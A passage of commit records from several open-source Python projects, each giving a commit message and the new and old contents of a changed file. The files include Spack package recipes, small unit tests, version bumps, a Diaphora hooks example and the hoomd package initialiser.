THROTTLE_TIMEFRAME= 60 * 60 #Timeframe in which to throttle N requests, seconds
THROTTLE_EXPIRATION= 24 * 60 * 60 # When to remove throttle entries from cache, seconds
with open(os.path.join(ENV_ROOT,"env.json")) as env_file:
ENV_TOKENS = json.load(env_file)
with open(os.path.join(ENV_ROOT, "auth.json")) as auth_file:
AUTH_TOKENS = json.load(auth_file)
DATABASES = AUTH_TOKENS.get('DATABASES', DATABASES)
CACHES = AUTH_TOKENS.get('CACHES', CACHES)
AWS_ACCESS_KEY_ID = AUTH_TOKENS.get('AWS_ACCESS_KEY_ID', AWS_ACCESS_KEY_ID)
AWS_SECRET_ACCESS_KEY = AUTH_TOKENS.get('AWS_SECRET_ACCESS_KEY', AWS_SECRET_ACCESS_KEY)
USE_S3_TO_STORE_MODELS = ENV_TOKENS.get('USE_S3_TO_STORE_MODELS', USE_S3_TO_STORE_MODELS)
S3_BUCKETNAME = ENV_TOKENS.get('S3_BUCKETNAME', S3_BUCKETNAME)
BROKER_URL = AUTH_TOKENS.get('BROKER_URL', BROKER_URL)
CELERY_RESULT_BACKEND = AUTH_TOKENS.get('CELERY_RESULT_BACKEND', CELERY_RESULT_BACKEND)
ELB_HOSTNAME = ENV_TOKENS.get('ELB_HOSTNAME', None)
EMAIL_BACKEND = ENV_TOKENS.get('EMAIL_BACKEND', EMAIL_BACKEND)
if ELB_HOSTNAME is not None:
ALLOWED_HOSTS += [ELB_HOSTNAME] | agpl-3.0 | Python |
6ac28c1daa0173ae5baa66c9cb020e9c673973ff | Add info for [email protected] (#5452) | EmreAtes/spack,tmerrick1/spack,lgarren/spack,EmreAtes/spack,lgarren/spack,iulian787/spack,krafczyk/spack,TheTimmy/spack,tmerrick1/spack,mfherbst/spack,TheTimmy/spack,krafczyk/spack,mfherbst/spack,TheTimmy/spack,TheTimmy/spack,tmerrick1/spack,mfherbst/spack,mfherbst/spack,EmreAtes/spack,matthiasdiener/spack,skosukhin/spack,krafczyk/spack,tmerrick1/spack,LLNL/spack,iulian787/spack,mfherbst/spack,iulian787/spack,LLNL/spack,LLNL/spack,krafczyk/spack,iulian787/spack,EmreAtes/spack,EmreAtes/spack,TheTimmy/spack,skosukhin/spack,LLNL/spack,matthiasdiener/spack,matthiasdiener/spack,matthiasdiener/spack,skosukhin/spack,krafczyk/spack,lgarren/spack,skosukhin/spack,lgarren/spack,skosukhin/spack,matthiasdiener/spack,lgarren/spack,tmerrick1/spack,LLNL/spack,iulian787/spack | var/spack/repos/builtin/packages/lftp/package.py | var/spack/repos/builtin/packages/lftp/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Lftp(AutotoolsPackage):
"""LFTP is a sophisticated file transfer program supporting a number
of network protocols (ftp, http, sftp, fish, torrent)."""
homepage = "http://lftp.yar.ru/"
url = "http://lftp.yar.ru/ftp/lftp-4.7.7.tar.gz"
version('4.8.1', '419b27c016d968a0226b2e5df1454c22')
version('4.7.7', 'ddc71b3b11a1af465e829075ae14b3ff')
depends_on('expat')
depends_on('libiconv')
depends_on('ncurses')
depends_on('openssl')
depends_on('readline')
depends_on('zlib')
def configure_args(self):
return [
'--with-expat={0}'.format(self.spec['expat'].prefix),
'--with-libiconv={0}'.format(self.spec['libiconv'].prefix),
'--with-openssl={0}'.format(self.spec['openssl'].prefix),
'--with-readline={0}'.format(self.spec['readline'].prefix),
'--with-zlib={0}'.format(self.spec['zlib'].prefix),
'--disable-dependency-tracking',
]
| ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Lftp(AutotoolsPackage):
"""LFTP is a sophisticated file transfer program supporting a number
of network protocols (ftp, http, sftp, fish, torrent)."""
homepage = "http://lftp.yar.ru/"
url = "http://lftp.yar.ru/ftp/lftp-4.7.7.tar.gz"
version('4.7.7', 'ddc71b3b11a1af465e829075ae14b3ff')
depends_on('expat')
depends_on('libiconv')
depends_on('ncurses')
depends_on('openssl')
depends_on('readline')
depends_on('zlib')
def configure_args(self):
return [
'--with-expat={0}'.format(self.spec['expat'].prefix),
'--with-libiconv={0}'.format(self.spec['libiconv'].prefix),
'--with-openssl={0}'.format(self.spec['openssl'].prefix),
'--with-readline={0}'.format(self.spec['readline'].prefix),
'--with-zlib={0}'.format(self.spec['zlib'].prefix),
'--disable-dependency-tracking',
]
| lgpl-2.1 | Python |
e2be8a486c9d13f98d9f14ae7b0cddf8225cf1b3 | Add boolswitch test | mpsonntag/bulk-rename,mpsonntag/bulk-rename | test/test_apv_rename.py | test/test_apv_rename.py | """
Copyright (c) 2017, Michael Sonntag ([email protected])
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted under the terms of the BSD License. See
LICENSE file in the root of the project.
"""
import os
import shutil
import tempfile
import unittest
import uuid
from bren.bulk_rename import BulkRename
class RenameTest(unittest.TestCase):
def setUp(self):
dir_name = "bren_%s" % str(uuid.uuid1())
self.tmpdir = os.path.join(tempfile.gettempdir(), dir_name)
if not os.path.isdir(self.tmpdir):
os.makedirs(self.tmpdir)
for i in range(0, 3):
tmp_file = "tmpfile_%s.jpg" % i
open(os.path.join(self.tmpdir, tmp_file), 'a').close()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_tmp_files(self):
self.assertEqual(len(os.listdir(self.tmpdir)), 3)
def test_bool_switch(self):
self.assertEqual(BulkRename._bool_switch(1), True)
self.assertEqual(BulkRename._bool_switch(2), False)
| """
Copyright (c) 2017, Michael Sonntag ([email protected])
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted under the terms of the BSD License. See
LICENSE file in the root of the project.
"""
import os
import shutil
import tempfile
import unittest
import uuid
class RenameTest(unittest.TestCase):
def setUp(self):
dir_name = "bren_%s" % str(uuid.uuid1())
self.tmpdir = os.path.join(tempfile.gettempdir(), dir_name)
if not os.path.isdir(self.tmpdir):
os.makedirs(self.tmpdir)
for i in range(0, 3):
tmp_file = "tmpfile_%s.jpg" % i
open(os.path.join(self.tmpdir, tmp_file), 'a').close()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_tmp_files(self):
self.assertEqual(len(os.listdir(self.tmpdir)), 3)
| bsd-3-clause | Python |
59faede78ad5d763c7c9fa1763e3e7cac67c1ca6 | Move Circle inside CxDeriv | rparini/cxroots,rparini/cxroots | cxroots/CxDerivative.py | cxroots/CxDerivative.py | from __future__ import division
import numpy as np
from numpy import inf, pi
import scipy.integrate
import math
def CxDeriv(f, contour=None):
"""
    Compute derivative of an analytic function using Cauchy's Integral Formula for Derivatives
"""
if contour is None:
from cxroots.Contours import Circle
C = lambda z0: Circle(z0, 1e-3)
else:
C = lambda z0: contour
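    # Cauchy's integral formula for derivatives: f^(n)(z0) = n!/(2*pi*i) * integral of f(z)/(z - z0)**(n+1) dz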
def df(z0, n):
integrand = lambda z: f(z)/(z-z0)**(n+1)
return C(z0).integrate(integrand) * math.factorial(n)/(2j*pi)
return np.vectorize(df)
| from __future__ import division
import numpy as np
from numpy import inf, pi
import scipy.integrate
import math
from cxroots.Contours import Circle, Rectangle
def CxDeriv(f, contour=None):
"""
    Compute derivative of an analytic function using Cauchy's Integral Formula for Derivatives
"""
if contour is None:
C = lambda z0: Circle(z0, 1e-3)
else:
C = lambda z0: contour
def df(z0, n):
integrand = lambda z: f(z)/(z-z0)**(n+1)
return C(z0).integrate(integrand) * math.factorial(n)/(2j*pi)
return np.vectorize(df)
| bsd-3-clause | Python |
2df7947f02fd39e05bf18a89f904e273d17c63ca | add v0.9.29 (#23606) | LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/lmdb/package.py | var/spack/repos/builtin/packages/lmdb/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Lmdb(MakefilePackage):
"""Symas LMDB is an extraordinarily fast, memory-efficient database we
developed for the Symas OpenLDAP Project. With memory-mapped files, it
has the read performance of a pure in-memory database while retaining
the persistence of standard disk-based databases."""
homepage = "https://lmdb.tech/"
url = "https://github.com/LMDB/lmdb/archive/LMDB_0.9.21.tar.gz"
version('0.9.29', sha256='22054926b426c66d8f2bc22071365df6e35f3aacf19ad943bc6167d4cae3bebb')
version('0.9.24', sha256='44602436c52c29d4f301f55f6fd8115f945469b868348e3cddaf91ab2473ea26')
version('0.9.22', sha256='f3927859882eb608868c8c31586bb7eb84562a40a6bf5cc3e13b6b564641ea28')
version('0.9.21', sha256='1187b635a4cc415bb6972bba346121f81edd996e99b8f0816151d4090f90b559')
version('0.9.16', sha256='49d7b40949f2ced9bc8b23ea6a89e75471a1c9126537a8b268c318a00b84322b')
build_directory = 'libraries/liblmdb'
@property
def install_targets(self):
return ['prefix={0}'.format(self.prefix), 'install']
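    # LMDB's own build system installs no pkg-config file, so generate lmdb.pc for dependents.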
@run_after('install')
def install_pkgconfig(self):
mkdirp(self.prefix.lib.pkgconfig)
with open(join_path(self.prefix.lib.pkgconfig, 'lmdb.pc'), 'w') as f:
f.write('prefix={0}\n'.format(self.prefix))
f.write('exec_prefix=${prefix}\n')
f.write('libdir={0}\n'.format(self.prefix.lib))
f.write('includedir={0}\n'.format(self.prefix.include))
f.write('\n')
f.write('Name: LMDB\n')
f.write('Description: Symas LMDB is an extraordinarily fast, '
'memory-efficient database.\n')
f.write('Version: {0}\n'.format(self.spec.version))
f.write('Cflags: -I${includedir}\n')
f.write('Libs: -L${libdir} -llmdb\n')
| # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Lmdb(MakefilePackage):
"""Symas LMDB is an extraordinarily fast, memory-efficient database we
developed for the Symas OpenLDAP Project. With memory-mapped files, it
has the read performance of a pure in-memory database while retaining
the persistence of standard disk-based databases."""
homepage = "https://lmdb.tech/"
url = "https://github.com/LMDB/lmdb/archive/LMDB_0.9.21.tar.gz"
version('0.9.24', sha256='44602436c52c29d4f301f55f6fd8115f945469b868348e3cddaf91ab2473ea26')
version('0.9.22', sha256='f3927859882eb608868c8c31586bb7eb84562a40a6bf5cc3e13b6b564641ea28')
version('0.9.21', sha256='1187b635a4cc415bb6972bba346121f81edd996e99b8f0816151d4090f90b559')
version('0.9.16', sha256='49d7b40949f2ced9bc8b23ea6a89e75471a1c9126537a8b268c318a00b84322b')
build_directory = 'libraries/liblmdb'
@property
def install_targets(self):
return ['prefix={0}'.format(self.prefix), 'install']
@run_after('install')
def install_pkgconfig(self):
mkdirp(self.prefix.lib.pkgconfig)
with open(join_path(self.prefix.lib.pkgconfig, 'lmdb.pc'), 'w') as f:
f.write('prefix={0}\n'.format(self.prefix))
f.write('exec_prefix=${prefix}\n')
f.write('libdir={0}\n'.format(self.prefix.lib))
f.write('includedir={0}\n'.format(self.prefix.include))
f.write('\n')
f.write('Name: LMDB\n')
f.write('Description: Symas LMDB is an extraordinarily fast, '
'memory-efficient database.\n')
f.write('Version: {0}\n'.format(self.spec.version))
f.write('Cflags: -I${includedir}\n')
f.write('Libs: -L${libdir} -llmdb\n')
| lgpl-2.1 | Python |
7abc503d6aa492f2340ab0b98d1f66892180ba19 | Fix some test error | thislight/wood,thislight/wood | tests/test_blueprint.py | tests/test_blueprint.py | from wood import Wood
from wood.support import Blueprint
def make_example_blueprint():
b = Blueprint()
b.empty(r"/example","example")
return b
def test_blueprint_can_add_empty_handler():
b = make_example_blueprint()
assert b != None
def test_blueprint_can_add_handlers_to_wood():
w = Wood()
b = make_example_blueprint()
b.to(w)
assert len(w.application.handlers) > 0
def test_blueprint_can_get_new_wood():
b = make_example_blueprint()
w = b.get_wood()
assert len(w.application.handlers) > 0
| from wood import Wood
from wood.support import Blueprint
def make_example_blueprint():
b = Blueprint()
b.empty(r"/example","example")
return b
def test_blueprint_can_add_empty_handler():
b = make_example_blueprint()
assert b != None
def test_blueprint_can_add_handlers_to_wood():
w = Wood()
b = make_example_blueprint()
b.to(w)
assert len(w.application.handlers) > 0
def test_blueprint_can_get_new_wood():
b = make_example_blueprint()
w.get_wood()
assert len(w.application.handlers) > 0
| apache-2.0 | Python |
d5438347980b4ed3f4a798b8c1019b87691f28bd | Bump version | walkr/oi,danbob123/oi | oi/version.py | oi/version.py | VERSION = '0.2.1'
| VERSION = '0.2.0'
| mit | Python |
676440a464d695146361eb1bdb684e121bf41a42 | fix simple_date parsing | lucuma/solution,jpscaletti/solution | solution/__init__.py | solution/__init__.py | # coding=utf-8
"""
=============================
Solution
=============================
An amazing form solution
:copyright: `Juan-Pablo Scaletti <http://jpscaletti.com>`_.
:license: MIT, see LICENSE for more details.
"""
from .form import Form # noqa
from .formset import FormSet # noqa
from .fields import * # noqa
from .validators import * # noqa
from .utils import Markup, get_html_attrs, to_unicode # noqa
__version__ = '5.2.6'
| # coding=utf-8
"""
=============================
Solution
=============================
An amazing form solution
:copyright: `Juan-Pablo Scaletti <http://jpscaletti.com>`_.
:license: MIT, see LICENSE for more details.
"""
from .form import Form # noqa
from .formset import FormSet # noqa
from .fields import * # noqa
from .validators import * # noqa
from .utils import Markup, get_html_attrs, to_unicode # noqa
__version__ = '5.2.5'
| mit | Python |
f6c6ff376974f604b2b4a7b62ad28fd56a264c55 | Add empty testing scaffolding. | sloede/pyglab,sloede/pyglab | test/test_exceptions.py | test/test_exceptions.py | #!/usr/bin/env python3
import pyglab.exceptions as ex
import unittest as ut
class TestBadRequest(ut.TestCase):
def test_throw(self):
pass
def test_statuscode(self):
pass
def test_message(self):
pass
def test_body(self):
pass
| #!/usr/bin/env python3
import pyglab.exceptions as ex
| mit | Python |
f13982144a2a0710af8e082dd01d73f036f026fd | Use clean_system fixture on pypackage test | takeflight/cookiecutter,0k/cookiecutter,terryjbates/cookiecutter,cichm/cookiecutter,letolab/cookiecutter,stevepiercy/cookiecutter,0k/cookiecutter,Vauxoo/cookiecutter,ramiroluz/cookiecutter,hackebrot/cookiecutter,tylerdave/cookiecutter,michaeljoseph/cookiecutter,nhomar/cookiecutter,dajose/cookiecutter,nhomar/cookiecutter,jhermann/cookiecutter,cichm/cookiecutter,Vauxoo/cookiecutter,moi65/cookiecutter,cguardia/cookiecutter,cguardia/cookiecutter,atlassian/cookiecutter,lucius-feng/cookiecutter,audreyr/cookiecutter,willingc/cookiecutter,agconti/cookiecutter,lgp171188/cookiecutter,vintasoftware/cookiecutter,jhermann/cookiecutter,sp1rs/cookiecutter,ramiroluz/cookiecutter,atlassian/cookiecutter,benthomasson/cookiecutter,drgarcia1986/cookiecutter,vincentbernat/cookiecutter,Springerle/cookiecutter,moi65/cookiecutter,foodszhang/cookiecutter,vincentbernat/cookiecutter,luzfcb/cookiecutter,terryjbates/cookiecutter,ionelmc/cookiecutter,benthomasson/cookiecutter,venumech/cookiecutter,pjbull/cookiecutter,willingc/cookiecutter,tylerdave/cookiecutter,drgarcia1986/cookiecutter,venumech/cookiecutter,dajose/cookiecutter,vintasoftware/cookiecutter,takeflight/cookiecutter,kkujawinski/cookiecutter,letolab/cookiecutter,ionelmc/cookiecutter,michaeljoseph/cookiecutter,christabor/cookiecutter,pjbull/cookiecutter,christabor/cookiecutter,kkujawinski/cookiecutter,sp1rs/cookiecutter,lucius-feng/cookiecutter,Springerle/cookiecutter,luzfcb/cookiecutter,agconti/cookiecutter,hackebrot/cookiecutter,audreyr/cookiecutter,lgp171188/cookiecutter,foodszhang/cookiecutter,janusnic/cookiecutter,stevepiercy/cookiecutter,janusnic/cookiecutter | tests/test_pypackage.py | tests/test_pypackage.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_pypackage
--------------
Tests formerly known from a unittest residing in test_generate.py named
TestPyPackage.test_cookiecutter_pypackage
"""
from __future__ import unicode_literals
import os
import subprocess
import pytest
from cookiecutter import utils
from tests.skipif_markers import skipif_travis, skipif_no_network
@pytest.fixture(scope='function')
def remove_additional_dirs(request):
"""
    Remove special directories which are created during the tests.
"""
def fin_remove_additional_dirs():
if os.path.isdir('cookiecutter-pypackage'):
utils.rmtree('cookiecutter-pypackage')
if os.path.isdir('boilerplate'):
utils.rmtree('boilerplate')
request.addfinalizer(fin_remove_additional_dirs)
@skipif_travis
@skipif_no_network
@pytest.mark.usefixtures('clean_system', 'remove_additional_dirs')
def test_cookiecutter_pypackage():
"""
Tests that https://github.com/audreyr/cookiecutter-pypackage.git works.
"""
proc = subprocess.Popen(
'git clone https://github.com/audreyr/cookiecutter-pypackage.git',
stdin=subprocess.PIPE,
shell=True
)
proc.wait()
proc = subprocess.Popen(
'cookiecutter --no-input cookiecutter-pypackage/',
stdin=subprocess.PIPE,
shell=True
)
proc.wait()
assert os.path.isdir('cookiecutter-pypackage')
assert os.path.isfile('boilerplate/README.rst')
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_pypackage
--------------
Tests formerly known from a unittest residing in test_generate.py named
TestPyPackage.test_cookiecutter_pypackage
"""
from __future__ import unicode_literals
import os
import subprocess
import pytest
from cookiecutter import utils
from tests.skipif_markers import skipif_travis, skipif_no_network
@pytest.fixture(scope='function')
def remove_additional_dirs(request):
"""
    Remove special directories which are created during the tests.
"""
def fin_remove_additional_dirs():
if os.path.isdir('cookiecutter-pypackage'):
utils.rmtree('cookiecutter-pypackage')
if os.path.isdir('boilerplate'):
utils.rmtree('boilerplate')
request.addfinalizer(fin_remove_additional_dirs)
@skipif_travis
@skipif_no_network
@pytest.mark.usefixtures('remove_additional_dirs')
def test_cookiecutter_pypackage():
"""
Tests that https://github.com/audreyr/cookiecutter-pypackage.git works.
"""
proc = subprocess.Popen(
'git clone https://github.com/audreyr/cookiecutter-pypackage.git',
stdin=subprocess.PIPE,
shell=True
)
proc.wait()
proc = subprocess.Popen(
'cookiecutter --no-input cookiecutter-pypackage/',
stdin=subprocess.PIPE,
shell=True
)
proc.wait()
assert os.path.isdir('cookiecutter-pypackage')
assert os.path.isfile('boilerplate/README.rst')
| bsd-3-clause | Python |
247e8f8ce8ed4677c629affec6b9a291c730e3a2 | Use assert_equal instead of assertEqual in fail testcase. | eerimoq/systest | tests/testcases/fail.py | tests/testcases/fail.py | from systest import TestCase
class FailTest(TestCase):
"""A test that always fails.
"""
count = 0
def __init__(self, name):
super(FailTest, self).__init__()
self.name = "fail_" + name
def run(self):
FailTest.count += 1
self.assert_equal(1, 0)
| from systest import TestCase
class FailTest(TestCase):
"""A test that always fails.
"""
count = 0
def __init__(self, name):
super(FailTest, self).__init__()
self.name = "fail_" + name
def run(self):
FailTest.count += 1
self.assertEqual(1, 0)
| mit | Python |
3c2d290452a07946880fc25af917b32766f9529d | Update test script to include deposit | c00w/BitToll,c00w/BitToll,c00w/BitToll,c00w/BitToll | testsuite/front_test.py | testsuite/front_test.py | #!/usr/bin/env python2
import gevent
import requests
import json
import time
import hashlib
ip_address = "vm"
port = "3000"
url = ''.join(['http://', ip_address, ':', port])
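# Request signature: MD5 over the parameter values concatenated in sorted-key order
# (note that the secret argument is not mixed into the hash here).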
def secret(params, secret):
keys = params.keys()
keys.sort()
hash_str = ""
for key in keys:
hash_str += (params[key])
md5 = hashlib.md5()
md5.update(hash_str)
return md5.hexdigest()
def test_login(login):
info = login
assert 'username' in info
assert 'secret' in info
assert len(info.keys()) == 2
def pytest_funcarg__login(request):
r = requests.get(url + '/register')
assert r.status_code == 200
info = json.loads(r.text)
assert 'username' in info
assert 'secret' in info
return info
def test_balance(login):
body = {}
body['username'] = login['username']
body['time'] = str(time.time())
body['sign'] = secret(body, login['secret'])
r = requests.post(url + '/balance', data=json.dumps(body))
assert r.status_code == 200
info = json.loads(r.text)
assert 'balance' in info
def test_deposit(login):
body = {}
body['username'] = login['username']
body['time'] = str(time.time())
body['sign'] = secret(body, login['secret'])
r = requests.post(url + '/deposit', data=json.dumps(body), timeout=1)
assert r.status_code == 200
info = json.loads(r.text)
assert 'address' in info
r2 = requests.post(url + '/deposit', data=json.dumps(body), timeout=1)
assert r2.text == r.text
| #!/usr/bin/env python2
import gevent
import requests
import json
import time
import hashlib
ip_address = "vm"
port = "3000"
url = ''.join(['http://', ip_address, ':', port])
def secret(params, secret):
keys = params.keys()
keys.sort()
hash_str = ""
for key in keys:
hash_str += (params[key])
md5 = hashlib.md5()
md5.update(hash_str)
return md5.hexdigest()
def test_login(login):
info = login
assert 'username' in info
assert 'secret' in info
assert len(info.keys()) == 2
def pytest_funcarg__login(request):
r = requests.get(url + '/register')
assert r.status_code == 200
info = json.loads(r.text)
assert 'username' in info
assert 'secret' in info
return info
def test_balance(login):
body = {}
body['username'] = login['username']
body['time'] = str(time.time())
body['sign'] = secret(body, login['secret'])
r = requests.post(url + '/balance', data=json.dumps(body))
print r.text
assert r.status_code == 200
info = json.loads(r.text)
assert 'balance' in info
| mit | Python |
f6c0258e257aa537dbb64bb8c5f10c87ec32dcf9 | Update my_hooks.py | joxeankoret/diaphora | hooks/my_hooks.py | hooks/my_hooks.py | #!/usr/bin/python
"""
Example Diaphora export hooks script. In this example script the following fake
scenario is considered:
1) There is a something-user.i64 database, for user-land stuff.
2) There is a something-kernel.i64 database, for kernel-land stuff.
3) We export all functions from the something-user.i64 database.
4) We only export from something-kernel.i64 the syscall_* or sys_* prefixed
functions.
5) In both databases there are constants referencing the build identifier but
they are different for both databases: BUILD-1000 in the user-land part and
BUILD-2000 in the kernel-land part. For making a perfect match based on the
constants found in both databases, we change the strings BUILD-XXX to the
generic string "BUILD-ID" for both databases.
"""
#-----------------------------------------------------------------------
FUNC_PREFIXES = ["syscall_", "sys_"]
BUILD_IDS = ["BUILD-1000", "BUILD-2000"]
#-----------------------------------------------------------------------
class CMyHooks:
def __init__(self, diaphora_obj):
""" @diaphora_obj is the CIDABinDiff object being used.
"""
self.diaphora = diaphora_obj
self.db_name = self.diaphora.db_name
def before_export_function(self, ea, func_name):
""" @ea is the address of the function that is going to be read.
Return True for the function to be read, or False to ignore it.
"""
# If the IDB name has the word 'user' on it, it's the user-land database for
# which we want to export everything.
if self.db_name.find("user") > -1:
return True
# Otherwise, it's the kernel-land IDB for which we only want to export the
# syscall functions.
if func_name:
# Is it a syscall?
for prefix in FUNC_PREFIXES:
if func_name.startswith(prefix):
return True
return False
def after_export_function(self, d):
""" @d is a dictionary with everything exported by Diaphora for the current
function. Transformations can be applied to the dictionary like changing
some strings or constants or whatever else. The function must return a
new dictionary with the modifications.
"""
# Search if any of the constants in the dictionary has the string "BUILD-*"
# and, if so, change it in the export process to a generic "BUILD-ID" string
# that will match more functions.
for build_id in BUILD_IDS:
for key in d:
if type(d[key]) is str:
if d[key].find(build_id) > -1:
d[key] = d[key].replace(build_id, "GENERIC-BUILD-ID")
return d
HOOKS = {"DiaphoraHooks": CMyHooks}
| #!/usr/bin/python
"""
Example Diaphora export hooks script. In this example script the following fake
scenario is considered:
1) There is a something-user.i64 database, for user-land stuff.
2) There is a something-kernel.i64 database, for kernel-land stuff.
3) We export all functions from the something-user.i64 database.
4) We only export from something-kernel.i64 the syscall_* or sys_* prefixed
functions.
5) In both databases there are constants referencing the build identifier but
they are different for both databases: BUILD-1000 in the user-land part and
BUILD-2000 in the kernel-land part. For making a perfect match based on the
constants found in both databases, we change the strings BUILD-XXX to the
generic string "BUILD-ID" for both databases.
"""
#-----------------------------------------------------------------------
FUNC_PREFIXES = ["syscall_", "sys_"]
BUILD_IDS = ["BUILD-1000", "BUILD-2000"]
#-----------------------------------------------------------------------
class CMyHooks:
def __init__(self, diaphora_obj):
""" @diaphora_obj is the CIDABinDiff object being used.
"""
self.diaphora = diaphora_obj
self.db_name = self.diaphora.db_name
def before_export_function(self, ea, func_name):
""" @ea is the address of the function that is going to be read.
Return True for the function to be read, or False to ignore it.
"""
# If the IDB name has the word 'user' on it, it's the user-land database for
# which we want to export everything.
if self.db_name.find("user") > -1:
return True
# Otherwise, it's the kernel-land IDB for which we only want to export the
# syscall functions.
if func_name:
# It is a syscall
if "syscall_%s" % func_name in SYSCALL_NAMES:
return True
return False
def after_export_function(self, d):
""" @d is a dictionary with everything exported by Diaphora for the current
function. Transformations can be applied to the dictionary like changing
some strings or constants or whatever else. The function must return a
new dictionary with the modifications.
"""
# Search if any of the constants in the dictionary has the string "BUILD-*"
# and, if so, change it in the export process to a generic "BUILD-ID" string
# that will match more functions.
for build_id in BUILD_IDS:
for key in d:
if type(d[key]) is str:
if d[key].find(build_id) > -1:
d[key] = d[key].replace(build_id, "GENERIC-BUILD-ID")
return d
HOOKS = {"DiaphoraHooks": CMyHooks}
| agpl-3.0 | Python |
4ab33cec7c0f4ee9fee7a7dce1c28466780b7074 | Add hoomd.box.Box to main namespace | joaander/hoomd-blue,joaander/hoomd-blue,joaander/hoomd-blue,joaander/hoomd-blue,joaander/hoomd-blue,joaander/hoomd-blue | hoomd/__init__.py | hoomd/__init__.py | # Copyright (c) 2009-2019 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
""" HOOMD-blue python API
:py:mod:`hoomd` provides a high level user interface for defining and executing
simulations using HOOMD.
.. rubric:: API stability
:py:mod:`hoomd` is **stable**. When upgrading from version 3.x to 3.y (y > x),
existing job scripts that follow *documented* interfaces for functions and
classes will not require any modifications.
**Maintainer:** Joshua A. Anderson
"""
# Maintainer: joaander
import sys;
import ctypes;
import os;
# need to import HOOMD with RTLD_GLOBAL in python sitedir builds
if not ('NOT_HOOMD_PYTHON_SITEDIR' in os.environ):
flags = sys.getdlopenflags();
sys.setdlopenflags(flags | ctypes.RTLD_GLOBAL);
from hoomd import _hoomd;
if not ('NOT_HOOMD_PYTHON_SITEDIR' in os.environ):
sys.setdlopenflags(flags);
from hoomd import meta
from hoomd import context
from hoomd import cite
from hoomd import analyze
from hoomd import benchmark
from hoomd import comm
from hoomd import compute
from hoomd import data
from hoomd import dump
from hoomd import group
from hoomd import init
from hoomd import integrate
from hoomd import option
from hoomd import update
from hoomd import util
from hoomd import variant
from hoomd import lattice
from hoomd import device
try:
from hoomd import md
except ImportError:
pass
try:
from hoomd import hpmc
except ImportError:
pass
try:
from hoomd import dem
except ImportError:
pass
# TODO: enable this import after updating MPCD to the new API
# try:
# from hoomd import mpcd
# except ImportError:
# pass
from hoomd.simulation import Simulation
from hoomd.state import State
from hoomd.operations import Operations
from hoomd.snapshot import Snapshot
from hoomd.logger import Logger
from hoomd.box import Box
from hoomd import tuner
from hoomd._hoomd import WalltimeLimitReached;
_default_excepthook = sys.excepthook;
## \internal
# \brief Override pythons except hook to abort MPI runs
def _hoomd_sys_excepthook(type, value, traceback):
_default_excepthook(type, value, traceback);
sys.stderr.flush();
if context.current.device is not None:
_hoomd.abort_mpi(context.current.device.cpp_exec_conf);
sys.excepthook = _hoomd_sys_excepthook
__version__ = "{0}.{1}.{2}".format(*_hoomd.__version__)
| # Copyright (c) 2009-2019 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
""" HOOMD-blue python API
:py:mod:`hoomd` provides a high level user interface for defining and executing
simulations using HOOMD.
.. rubric:: API stability
:py:mod:`hoomd` is **stable**. When upgrading from version 3.x to 3.y (y > x),
existing job scripts that follow *documented* interfaces for functions and
classes will not require any modifications.
**Maintainer:** Joshua A. Anderson
"""
# Maintainer: joaander
import sys;
import ctypes;
import os;
# need to import HOOMD with RTLD_GLOBAL in python sitedir builds
if not ('NOT_HOOMD_PYTHON_SITEDIR' in os.environ):
flags = sys.getdlopenflags();
sys.setdlopenflags(flags | ctypes.RTLD_GLOBAL);
from hoomd import _hoomd;
if not ('NOT_HOOMD_PYTHON_SITEDIR' in os.environ):
sys.setdlopenflags(flags);
from hoomd import meta
from hoomd import context
from hoomd import cite
from hoomd import analyze
from hoomd import benchmark
from hoomd import comm
from hoomd import compute
from hoomd import data
from hoomd import dump
from hoomd import group
from hoomd import init
from hoomd import integrate
from hoomd import option
from hoomd import update
from hoomd import util
from hoomd import variant
from hoomd import lattice
from hoomd import device
try:
from hoomd import md
except ImportError:
pass
try:
from hoomd import hpmc
except ImportError:
pass
try:
from hoomd import dem
